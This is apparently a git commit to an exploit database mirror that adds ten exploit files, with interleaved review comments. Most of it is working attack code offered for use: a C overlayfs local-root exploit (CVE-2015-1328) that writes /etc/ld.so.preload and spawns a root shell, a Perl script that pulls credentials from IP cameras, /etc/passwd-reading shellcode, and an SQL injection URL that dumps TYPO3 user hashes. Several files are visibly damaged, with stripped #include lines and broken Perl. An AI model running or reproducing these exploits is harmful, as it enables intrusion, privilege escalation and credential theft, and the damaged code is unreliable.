From f6c02117f7fe749747e11110e372a1db83837cb5 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 17 Jun 2015 05:03:19 +0000
Subject: [PATCH] DB: 2015-06-17 10 new exploits
---
files.csv | 11 +-
platforms/hardware/webapps/37298.txt | 147 ++++++++++++++++
platforms/linux/local/37292.c | 153 +++++++++++++++++
platforms/linux/local/37293.txt | 97 +++++++++++
platforms/linux/shellcode/37297.txt | 51 ++++++
platforms/php/webapps/37296.txt | 36 ++++
platforms/php/webapps/37301.txt | 149 ++++++++++++++++
platforms/php/webapps/37302.txt | 107 ++++++++++++
platforms/windows/dos/37287.html | 244 +++++++++++++++++++++++++++
platforms/windows/dos/37299.py | 43 +++++
platforms/windows/dos/37300.py | 44 +++++
11 files changed, 1081 insertions(+), 1 deletion(-)
create mode 100755 platforms/hardware/webapps/37298.txt
create mode 100755 platforms/linux/local/37292.c
create mode 100755 platforms/linux/local/37293.txt
create mode 100755 platforms/linux/shellcode/37297.txt
create mode 100755 platforms/php/webapps/37296.txt
create mode 100755 platforms/php/webapps/37301.txt
create mode 100755 platforms/php/webapps/37302.txt
create mode 100755 platforms/windows/dos/37287.html
create mode 100755 platforms/windows/dos/37299.py
create mode 100755 platforms/windows/dos/37300.py
diff --git a/files.csv b/files.csv
index 3dcdb5d51..7a8bbd3be 100755
--- a/files.csv
+++ b/files.csv
@@ -33625,7 +33625,11 @@ id,file,description,date,author,platform,type,port
 37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80
 37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0
 37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
-37256,platforms/multiple/webapps/37256.txt,"Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability",2015-06-10,Vulnerability-Lab,multiple,webapps,0
+37298,platforms/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",hardware,webapps,80
+37299,platforms/windows/dos/37299.py,"XtMediaPlayer 0.93 (.wav) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0
+37300,platforms/windows/dos/37300.py,"FinePlayer 2.20 (.mp4) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0
+37301,platforms/php/webapps/37301.txt,"TYPO3 Akronymmanager Extension 0.5.0 - SQL Injection",2015-06-16,"RedTeam Pentesting",php,webapps,80
+37302,platforms/php/webapps/37302.txt,"E-Detective Lawful Interception System - Multiple Vulnerabilities",2015-06-16,"Mustafa Al-Bassam",php,webapps,0
 37257,platforms/php/webapps/37257.txt,"FiverrScript CSRF Vulnerability (Add New Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80
 37258,platforms/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams Remote File Disclosure Exploit",2015-06-10,"Viktor Minin",hardware,webapps,0
 37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443
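Review bot: The hunk drops the index row `-37256,platforms/multiple/webapps/37256.txt,...` although the subject announces only "10 new exploits" and the diffstat lists no deletion of that file, so unless 37256.txt is removed in another commit the index and the tree now disagree; either restore the row or state the removal in the commit message. The five added rows are also inserted between 37250 and 37257 instead of in id order near the end of the file, where the other two hunks place 37287, 37292, 37293, 37296 and 37297, which makes the index harder to scan and to diff later.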
@@ -33637,6 +33641,7 @@ id,file,description,date,author,platform,type,port
 37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
 37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 (.m3u) Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
 37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
+37292,platforms/linux/local/37292.c,"Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shell)",2015-06-16,%rebel%,linux,local,0
 37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
 37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
 37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,8080
@@ -33650,5 +33655,9 @@ id,file,description,date,author,platform,type,port
 37282,platforms/php/webapps/37282.txt,"concrete5 index.php/tools/required/files/bulk_properties searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37283,platforms/php/webapps/37283.txt,"AZ Photo Album Cross Site Scripting and Arbitrary File Upload Vulnerabilities",2012-05-20,"Eyup CELIK",php,webapps,0
 37286,platforms/windows/dos/37286.py,"Filezilla 3.11.0.2 - SFTP Module Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
+37287,platforms/windows/dos/37287.html,"Cisco AnyConnect Secure Mobility 2.x_ 3.x_ 4.x - Client DoS PoC",2015-06-15,LiquidWorm,windows,dos,0
 37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection Vulnerability",2015-06-15,"walid naceri",php,webapps,0
 37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
+37293,platforms/linux/local/37293.txt,"Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shadow File)",2015-06-16,%rebel%,linux,local,0
+37296,platforms/php/webapps/37296.txt,"Ektron CMS 9.10 SP1 (Build 9.1.0.184.1.114) - CSRF Vulnerability",2015-06-16,"Jerold Hoong",php,webapps,0
+37297,platforms/linux/shellcode/37297.txt,"Linux/x86 - /etc/passwd Reader (58 bytes)",2015-06-16,B3mB4m,linux,shellcode,0
diff --git a/platforms/hardware/webapps/37298.txt b/platforms/hardware/webapps/37298.txt
new file mode 100755
index 000000000..57b5f6154
--- /dev/null
+++ b/platforms/hardware/webapps/37298.txt
@@ -0,0 +1,147 @@ +*# Exploit Title: Apexis IP CAM - Full Info Disclosure ** +**# Google Dork: inurl:"get_status.cgi"cgi-bin/** +**# Date: 01/06/2015** +**# Exploit Author: Sunplace Solutions - Soluciones Informáticas - #RE +Remoteexecution.net** +**# Vendor Homepage: http://www.apexis.com.cn/** +**# Tested on: Linux** +* +*Models Afected :** +** +**APM-H602-MPC** +**APM-H803-MPC** +**APM-H901-MPC** +**APM-H501-MPC** +**APM-H403-MPC** +**APM-H804* + +_* +*__*Usage: please enter the url ipcam Example : *_ + +http://server/cgi-bin/get_status.cgi o +http://server/cgi-bin/get_tutk_account.cgi + +_*You get something like this*__*:*_ + +[Sunplace@solutions ]$ perl xploit.pl +[ Apexis IP CAM - Full Info Disclosure ] +[ Discovery by: Sunplace Solutions ] +[ Exploit: Sunplace Solutions - Daniel Godoy ] +[ Greetz: www.remoteexecution.net - ] +URL: http://server/cgi-bin/get_tutk_account.cgi + +[x]Trying to pwn =>/get_tutk_account.cgi +Result: +tutk_result=1; +tutk_guid='FBX9937PJG273MPMMRZJ'; +tutk_user='admin'; +tutk_pwd='lolo2502'; + +[x]Trying to pwn => /get_tutk_account +Result: +tutk_result=1; +tutk_guid='FBX9937PJG273MPMMRZJ'; +tutk_user='admin'; +tutk_pwd='lolo2502'; + +[x]Trying to pwn => /get_extra_server.cgi +Result: +extraserv_result=1; +server_enable=0; +server_ipaddr='192.168.1.220'; +server_port=6666; +server_time=10; + + +_*Index of /cgi-bin/ example:*_ + +backup_params.cgi +check_user.cgi +clear_log.cgi +control_cruise.cgi +decoder_control.cgi +delete_sdcard_file.cgi +download_sdcard_file.cgi +format_sdc.cgi +get_alarm_schedule.cgi +get_camera_vars.cgi +get_cruise.cgi +get_extra_server.cgi +get_list_cruise.cgi +get_log_info.cgi +get_log_page.cgi +get_maintain.cgi +get_motion_schedule.cgi +get_params.cgi +get_preset_status.cgi +get_real_status.cgi +get_sdc_status.cgi +get_status.cgi +get_sycc_account.cgi +get_tutk_account.cgi +get_wifi_scan_result.cgi +mobile_snapshot.cgi +reboot.cgi + +And more...... 
+ + + +_*[Exploit Code]*__* +*_ +#!/usr/bin/perl +print "[ Apexis IP CAM - Full Info Disclosure ]\n"; +print "[ Discovery by: Sunplace Solutions ]\n"; +print "[ Exploit: Sunplace Solutions ]\n"; +print "[ Greetz: www.remoteexecution.net - Daniel Godoy ]\n"; +print "URL: "; +$url=; +use LWP::UserAgent; +my $ua = LWP::UserAgent->new; + +$ua->agent('Mozilla/35.0 (compatible; MSIE 5.0; Windows 7)'); + +chop($url); +if ($url eq "") + { + print 'URL dont empty!.'."\n"; + } + else + { + $www = new LWP::UserAgent; + @path=split(/cgi-bin/,$url); + $content = $www->get($url) or error(); + print "\n[x]Trying to pwn =>".$path[1]."\n"; + print "Result: \n"; + + $pwn = $content->content; + $pwn=~ s/var//g; + $pwn=~ s/ //g; + $pwn=~ s/ret_//g; + print $pwn; + + print "\n[x]Trying to pwn => /get_tutk_account\n"; + print "Result: \n"; + $content = $www->get($path[0]."cgi-bin/get_tutk_account.cgi") or +error(); + $pwn = $content->content; + $pwn=~ s/var//g; + $pwn=~ s/ret_//g; + $pwn=~ s/ //g; + + print $pwn; + + print "\n[x]Trying to pwn => /get_extra_server.cgi\n"; + print "Result: \n"; + $content = $www->get($path[0]."cgi-bin/get_extra_server.cgi") or +error(); + $pwn = $content->content; + $pwn=~ s/var//g; + $pwn=~ s/ret_//g; + $pwn=~ s/extra_//g; + $pwn=~ s/ //g; + print $pwn; + } + + + diff --git a/platforms/linux/local/37292.c b/platforms/linux/local/37292.c new file mode 100755 index 000000000..3e92040cc --- /dev/null +++ b/platforms/linux/local/37292.c 
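Review bot: The sample output in the new file publishes what look like live device values (`tutk_guid='FBX9937PJG273MPMMRZJ'`, `tutk_user='admin'`, `tutk_pwd='lolo2502'`, `server_ipaddr='192.168.1.220'`); an advisory mirrored into a public database should carry obvious placeholders there instead. The script body also appears damaged by the export: `$url=;` is not valid Perl (presumably an angle-bracketed read that was stripped along with the other markup, the same way the prose shows doubled `**` artefacts), and `error()` is invoked on every failed `get` but is never defined, so the copy as committed neither parses nor reports failures. Worth checking the mirror against the source before it is indexed as a working file.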
@@ -0,0 +1,153 @@ +/* +# Exploit Title: ofs.c - overlayfs local root in ubuntu +# Date: 2015-06-15 +# Exploit Author: rebel +# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15) +# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04 +# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html) + +*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* +CVE-2015-1328 / ofs.c +overlayfs incorrect permission handling + FS_USERNS_MOUNT + +user@ubuntu-server-1504:~$ uname -a +Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux +user@ubuntu-server-1504:~$ gcc ofs.c -o ofs +user@ubuntu-server-1504:~$ id +uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev) +user@ubuntu-server-1504:~$ ./ofs +spawning threads +mount #1 +mount #2 +child threads done +/etc/ld.so.preload created +creating shared library +# id +uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user) + +greets to beist & kaliman +2015-05-24 +%rebel% +*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* +*/ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define LIB "#include \n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n" + +static char child_stack[1024*1024]; + +static int +child_exec(void *stuff) +{ + char *file; + system("rm -rf /tmp/ns_sploit"); + mkdir("/tmp/ns_sploit", 0777); + mkdir("/tmp/ns_sploit/work", 
0777); + mkdir("/tmp/ns_sploit/upper",0777); + mkdir("/tmp/ns_sploit/o",0777); + + fprintf(stderr,"mount #1\n"); + if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) { +// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower + if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) { + fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n"); + exit(-1); + } + file = ".access"; + chmod("/tmp/ns_sploit/work/work",0777); + } else file = "ns_last_pid"; + + chdir("/tmp/ns_sploit/o"); + rename(file,"ld.so.preload"); + + chdir("/"); + umount("/tmp/ns_sploit/o"); + fprintf(stderr,"mount #2\n"); + if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) { + if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) { + exit(-1); + } + chmod("/tmp/ns_sploit/work/work",0777); + } + + chmod("/tmp/ns_sploit/o/ld.so.preload",0777); + umount("/tmp/ns_sploit/o"); +} + +int +main(int argc, char **argv) +{ + int status, fd, lib; + pid_t wrapper, init; + int clone_flags = CLONE_NEWNS | SIGCHLD; + + fprintf(stderr,"spawning threads\n"); + + if((wrapper = fork()) == 0) { + if(unshare(CLONE_NEWUSER) != 0) + fprintf(stderr, "failed to create new user namespace\n"); + + if((init = fork()) == 0) { + pid_t pid = + clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); + if(pid < 0) { + fprintf(stderr, "failed to create new mount namespace\n"); + exit(-1); + } + + waitpid(pid, &status, 0); + + } + + waitpid(init, &status, 0); + return 0; + } + + usleep(300000); + + wait(NULL); + + fprintf(stderr,"child threads done\n"); + + fd = open("/etc/ld.so.preload",O_WRONLY); + + if(fd == -1) { + 
fprintf(stderr,"exploit failed\n"); + exit(-1); + } + + fprintf(stderr,"/etc/ld.so.preload created\n"); + fprintf(stderr,"creating shared library\n"); + lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777); + write(lib,LIB,strlen(LIB)); + close(lib); + lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w"); + if(lib != 0) { + fprintf(stderr,"couldn't create dynamic library\n"); + exit(-1); + } + write(fd,"/tmp/ofs-lib.so\n",16); + close(fd); + system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c"); + execl("/bin/su","su",NULL); +} + diff --git a/platforms/linux/local/37293.txt b/platforms/linux/local/37293.txt new file mode 100755 index 000000000..a354ef5c2 --- /dev/null +++ b/platforms/linux/local/37293.txt 
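Review bot: Every `#include` line in the new file is empty, so the header names appear to have been stripped during the export together with other angle-bracketed text (37297.txt shows the same pattern); the mirrored copy should be compared with the source before the index lists it as a buildable file. Separately, `child_exec` is declared `static int` but falls off the end after the final `umount(...)` without a `return`, which is undefined behaviour in C and is also the value `clone()` reports as the child's exit status, so a `return 0;` belongs there. From the defender's side the header comment names CVE-2015-1328 and the affected Ubuntu releases but not the mitigation; a one-line pointer to the workaround given in 37293.txt (removing or blacklisting overlayfs.ko / overlay.ko when overlayfs is not needed) would make the entry more useful to people triaging the advisory.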
@@ -0,0 +1,97 @@ +The overlayfs filesystem does not correctly check file permissions when +creating new files in the upper filesystem directory. This can be exploited +by an unprivileged process in kernels with CONFIG_USER_NS=y and where +overlayfs has the FS_USERNS_MOUNT flag, which allows the mounting of overlayfs +inside unprivileged mount namespaces. This is the default configuration of +Ubuntu 12.04, 14.04, 14.10, and 15.04 [1]. + +If you don't want to update your kernel and you don't use overlayfs, a viable +workaround is to just remove or blacklist overlayfs.ko / overlay.ko. + +Details +================================ + +>From Documentation/filesystems/overlayfs.txt [2]: + +"Objects that are not directories (files, symlinks, device-special +files etc.) are presented either from the upper or lower filesystem as +appropriate. When a file in the lower filesystem is accessed in a way +the requires write-access, such as opening for write access, changing +some metadata etc., the file is first copied from the lower filesystem +to the upper filesystem (copy_up)." + +The ovl_copy_up_* functions do not correctly check that the user has +permission to write files to the upperdir directory. The only permissions +that are checked is if the owner of the file that is being modified has +permission to write to the upperdir. Furthermore, when a file is copied from +the lowerdir the file metadata is carbon copied, instead of attributes such as +owner being changed to the user that triggered the copy_up_* procedures. 
+ +Example of creating a 1:1 copy of a root-owned file: + +(Note that the workdir= option is not needed on older kernels) + +user@...ntu-server-1504:~$ ./create-namespace +root@...ntu-server-1504:~# mount -t overlay -o +lowerdir=/etc,upperdir=upper,workdir=work overlayfs o +root@...ntu-server-1504:~# chmod 777 work/work/ +root@...ntu-server-1504:~# cd o +root@...ntu-server-1504:~/o# mv shadow copy_of_shadow +(exit the namespace) +user@...ntu-server-1504:~$ ls -al upper/copy_of_shadow +-rw-r----- 1 root shadow 1236 May 24 15:51 upper/copy_of_shadow +user@...ntu-server-1504:~$ stat upper/copy_of_shadow /etc/shadow|grep Inode +Device: 801h/2049d Inode: 939791 Links: 1 +Device: 801h/2049d Inode: 277668 Links: 1 + +Now we can place this file in /etc by switching "upper" to be the lowerdir +option, the permission checks pass since the file is owned by root and root +can write to /etc. + +user@...ntu-server-1504:~$ ./create-namespace +root@...ntu-server-1504:~# mount -t overlay -o +lowerdir=upper,upperdir=/etc,workdir=work overlayfs o +root@...ntu-server-1504:~# chmod 777 work/work/ +root@...ntu-server-1504:~# cd o +root@...ntu-server-1504:~/o# chmod 777 copy_of_shadow +root@...ntu-server-1504:~/o# exit +user@...ntu-server-1504:~$ ls -al /etc/copy_of_shadow +-rwxrwxrwx 1 root shadow 1236 May 24 15:51 /etc/copy_of_shadow + +The attached exploit gives a root shell by creating a world-writable +/etc/ld.so.preload file. The exploit has been tested on the most recent +kernels before 2015-06-15 on Ubuntu 12.04, 14.04, 14.10 and 15.04. 
+ +It is also possible to list directory contents for any directory on the system +regardless of permissions: + +nobody@...ntu-server-1504:~$ ls -al /root +ls: cannot open directory /root: Permission denied +nobody@...ntu-server-1504:~$ mkdir o upper work +nobody@...ntu-server-1504:~$ mount -t overlayfs -o +lowerdir=/root,upperdir=/home/user/upper,workdir=/home/user/work +overlayfs /home/user/o +nobody@...ntu-server-1504:~$ ls -al o 2>/dev/null +total 8 +drwxrwxr-x 1 root nogroup 4096 May 24 16:33 . +drwxr-xr-x 8 root nogroup 4096 May 24 16:33 .. +-????????? ? ? ? ? ? .bash_history +-????????? ? ? ? ? ? .bashrc +d????????? ? ? ? ? ? .cache +-????????? ? ? ? ? ? .lesshst +d????????? ? ? ? ? ? linux-3.19.0 + + +Credit +================================ +Philip Pettersson, Samsung SDS Security Center + +References +================================ +[1] https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/vivid/commit/?id=78ec4549 +[2] https://www.kernel.org/doc/Documentation/filesystems/overlayfs.txt +[3] http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html + + + +## EDB Note: Exploit Mirror - https://www.exploit-db.com/exploits/37292/ \ No newline at end of file diff --git a/platforms/linux/shellcode/37297.txt b/platforms/linux/shellcode/37297.txt new file mode 100755 index 000000000..c8dd167e9 --- /dev/null +++ b/platforms/linux/shellcode/37297.txt 
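Review bot: The text carries mailing-list archive artefacts rather than the original advisory: `>From Documentation/filesystems/overlayfs.txt [2]:` has the mbox `>From` escape, and every prompt reads `user@...ntu-server-1504` or `nobody@...ntu-server-1504` where the archive masked what it took for an e-mail address (the same host appears intact as `ubuntu-server-1504` in 37292.c). Since the closing EDB note points at 37292 as the companion exploit, these lines should be restored from the source post so the two entries agree. The workaround paragraph near the top (remove or blacklist the overlayfs module if unused) is the most actionable sentence for defenders and deserves to stay as prominent as it is.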
@@ -0,0 +1,51 @@ +Linux/x86 - /etc/passwd Reader - 58 bytes + +#Greetz : Bomberman(Leader),wiremask.eu +#Author : B3mB4m +#Concat : Do not disturb - Bomberman +#Bu adamı geçmeden konuşmaya iznim yok.Iki yıl sonra görüşmek üzre :) + +#Info +#File descriptor on EBX +#Buffer on ECX +#Bytes to read on EDX + + +Disassembly of section .text: + +08048060 <.text>: + 8048060: 31 c9 xor %ecx,%ecx + 8048062: 31 c0 xor %eax,%eax + 8048064: 31 d2 xor %edx,%edx + 8048066: 51 push %ecx + 8048067: b0 05 mov $0x5,%al + 8048069: 68 73 73 77 64 push $0x64777373 + 804806e: 68 63 2f 70 61 push $0x61702f63 + 8048073: 68 2f 2f 65 74 push $0x74652f2f + 8048078: 89 e3 mov %esp,%ebx + 804807a: cd 80 int $0x80 + 804807c: 89 d9 mov %ebx,%ecx + 804807e: 89 c3 mov %eax,%ebx + 8048080: b0 03 mov $0x3,%al + 8048082: 66 ba ff 0f mov $0xfff,%dx + 8048086: 66 42 inc %dx + 8048088: cd 80 int $0x80 + 804808a: 31 c0 xor %eax,%eax + 804808c: 31 db xor %ebx,%ebx + 804808e: b3 01 mov $0x1,%bl + 8048090: b0 04 mov $0x4,%al + 8048092: cd 80 int $0x80 + 8048094: 31 c0 xor %eax,%eax + 8048096: b0 01 mov $0x1,%al + 8048098: cd 80 int $0x80 + + +#include +#include + +char *shellcode = +"\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0\x03\x66\xba\xff\x0f\x66\x42\xcd\x80\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; + +int main(void){ + fprintf(stdout,"Length: %d\n",strlen(shellcode)); + (*(void(*)()) shellcode)();} diff --git a/platforms/php/webapps/37296.txt b/platforms/php/webapps/37296.txt new file mode 100755 index 000000000..fbc4d1548 --- /dev/null +++ b/platforms/php/webapps/37296.txt 
@@ -0,0 +1,36 @@ +# Vulnerability type: Cross-site Request Forgery +# Vendor: http://www.ektron.com/ +# Product: Ektron Content Management System +# Affected version: =< 9.10 SP1 (Build 9.1.0.184.1.114) +# Patched version: 9.10 SP1 (Build 9.1.0.184.1.120) +# CVE ID: CVE-2015-3624 +# Credit: Jerold Hoong + +# PROOF OF CONCEPT (CSRF) + +Cross-site request forgery (CSRF) vulnerability in MenuActions.aspx in Ektron CMS 9.10 +SP1 before build 9.1.0.184.1.120 allows remote attackers to hijack the authentication +of content administrators for requests that could lead to the deletion of content and +assets. + + + +
+ + + + + + + +
+ + + +# TIMELINE +– 07/04/2015: Vulnerability found +– 07/04/2015: Vendor informed +– 08/04/2015: Vendor responded and acknowledged +- 01/05/2015: MITRE issued CVE number CVE-2015-3624 +– 28/05/2015: Vendor fixed the issue +– 31/05/2015: Public disclosure \ No newline at end of file diff --git a/platforms/php/webapps/37301.txt b/platforms/php/webapps/37301.txt new file mode 100755 index 000000000..69a228a28 --- /dev/null +++ b/platforms/php/webapps/37301.txt 
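Review bot: The "PROOF OF CONCEPT (CSRF)" section consists only of empty `+` lines, so the HTML form the advisory refers to appears to have been stripped in the export; as committed the file names `MenuActions.aspx` but records no request at all, which leaves nothing to verify the fixed build 9.1.0.184.1.120 against. The markup should be restored from the source advisory before the entry is indexed. The timeline also mixes `–` and `-` as bullet characters (the 01/05/2015 line differs from the rest).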
@@ -0,0 +1,149 @@ +Advisory: SQL Injection in TYPO3 Extension Akronymmanager + +An SQL injection vulnerability in the TYPO3 extension "Akronymmanager" +allows authenticated attackers to inject SQL statements and thereby read +data from the TYPO3 database. + + +Details +======= + +Product: sb_akronymmanager +Affected Versions: <=0.5.0 +Fixed Versions: 7.0.0 +Vulnerability Type: SQL Injection +Security Risk: medium +Vendor URL: http://typo3.org/extensions/repository/view/sb_akronymmanager +Vendor Status: fixed version released +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-002 +Advisory Status: published +CVE: CVE-2015-2803 +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2803 + + +Introduction +============ + +"The Acronym Manager adds special explanatory markup to acronyms, abbreviations +and foreign words on the whole site following the requirement to accessible web +content. + +It provides a backend module to administer a list of words to generate new HTML +elements for explanatory markup." + +(from the extension's documentation) + + +More Details +============ + +Users with the respective privileges can maintain acronyms through the +Akronymmanager extension pages in the TYPO3 backend web interface. + +In the extension's file mod1/index.php, an SQL query is generated like +follows (line 357 and following): + +[...] +$pageID = t3lib_div::_GET("id"); +if ($pageID) $where = "uid='$pageID' AND "; +$result = $GLOBALS['TYPO3_DB']->exec_SELECTquery('title,uid', 'pages', + $where.'hidden="0" AND deleted="0"','sorting'); +[...] + +The value of the user-supplied HTTP GET parametre 'id' is used without +sanitizing it before its use in the subsequent SQL statement. Therefore, +attackers are able to manipulate the resulting SQL statement and inject +their own queries into the statement. 
+ + +Proof of Concept +================ + +When requesting the following URL, the vulnerability is exploited to yield all +usernames and hashes from the TYPO3 be_users database: + +------------------------------------------------------------------------ +http://server/typo3conf/ext/sb_akronymmanager/mod1/index.php? +id=379%27%20UNION%20SELECT%20(SELECT%20group_concat(username,%27:%27,password) +%20FROM%20be_users),2%20--%20 +------------------------------------------------------------------------ + +The login credentials are then embedded in the HTML page that is +returned: + +[...] + +

user1:$hash,user2:$hash[...]

+[...] + + +Workaround +========== + +Only give trusted users access to the Akronymmanager extension in the +TYPO3 backend. + + +Fix +=== + +Upgrade the extension to version 7.0.0. + + +Security Risk +============= + +An attacker who has access to the backend part of the Akronymmanager +extension may send SQL queries to the database. This can be used to read +arbitrary tables of the TYPO3 database and may ultimately result in a +privilege escalation if the TYPO3 users' password hashes can be cracked +efficiently. Depending on the database configuration, it might also be +possible to execute arbitrary commands on the database host. As the +attack requires an attacker who already has backend access, the +vulnerability is estimated to pose only a medium risk. + + +Timeline +======== + +2015-02-25 Vulnerability identified +2015-03-04 Customer approved disclosure to vendor +2015-03-10 CVE number requested +2015-03-10 Vendor notified +2015-03-26 CVE number requested again +2015-03-31 CVE number assigned (request #2) +2015-03-31 Vendor notified again +2015-03-31 Vendor responded +2015-04-08 Vendor announced fixed version available at the end of April +2015-05-13 Requested update from vendor +2015-05-15 Vendor requests more time +2015-05-21 Requested update from vendor +2015-05-22 Vendor states that upload to extension registry doesn't work +2015-06-03 Requested update from vendor +2015-06-10 Vendor uploads new version to extension registry +2015-06-15 Advisory published + + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. 
+ +More information about RedTeam Pentesting can be found at +https://www.redteam-pentesting.de. + + +-- +RedTeam Pentesting GmbH Tel.: +49 241 510081-0 +Dennewartstr. 25-27 Fax : +49 241 510081-99 +52068 Aachen https://www.redteam-pentesting.de +Germany Registergericht: Aachen HRB 14004 +Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file diff --git a/platforms/php/webapps/37302.txt b/platforms/php/webapps/37302.txt new file mode 100755 index 000000000..5429e4d3f --- /dev/null +++ b/platforms/php/webapps/37302.txt 
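Review bot: Between the two `+[...]` lines of the Proof of Concept section, the lines `user1:$hash,user2:$hash[...]` and the blank lines around it carry no `+` marker, so the hunk is malformed and a patch tool would reject it; the HTML sample that framed them was presumably dropped by the export and the line count of 149 no longer matches. From the defender's side, the "Fix" section only says to upgrade to 7.0.0 and the "Workaround" is access control; since the quoted code shows the GET parameter `id` interpolated unquoted into the WHERE clause, one sentence on how 7.0.0 handles that value would help sites that cannot upgrade immediately.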
@@ -0,0 +1,107 @@ +Advisory: E-Detective Lawful Interception System + multiple security vulnerabilities +Date: 14/06/2015 +CVE: unassigned +Authors: Mustafa Al-Bassam (https://musalbas.com) + slipstream/RoL (https://twitter.com/TheWack0lian) +Software: Decision Group E-Detective Lawful Interception System +Vendor URL: http://www.edecision4u.com/ + +Software description: + +"E-Detective is a real-time Internet interception, monitoring and +forensics system that captures, decodes, and reconstructs various types +of Internet traffic. It is commonly used for organization Internet +behavioural monitoring, auditing, record keeping, forensics analysis, and +investigation, as well as, legal and lawful interception for lawful +enforcement agencies such as Police Intelligence, Military Intelligence, +Cyber Security Departments, National Security Agencies, Criminal +Investigation Agencies, Counter Terrorism Agencies etc." + +Vulnerabilities: + +1) Unauthenticated Local File Disclosure + +----- +Proof-of-concept: +https://github.com/musalbas/edetective-poc/blob/master/pwned-detective.py + +# Proof-of-concept for unauthenticated LFD in E-Detective. 
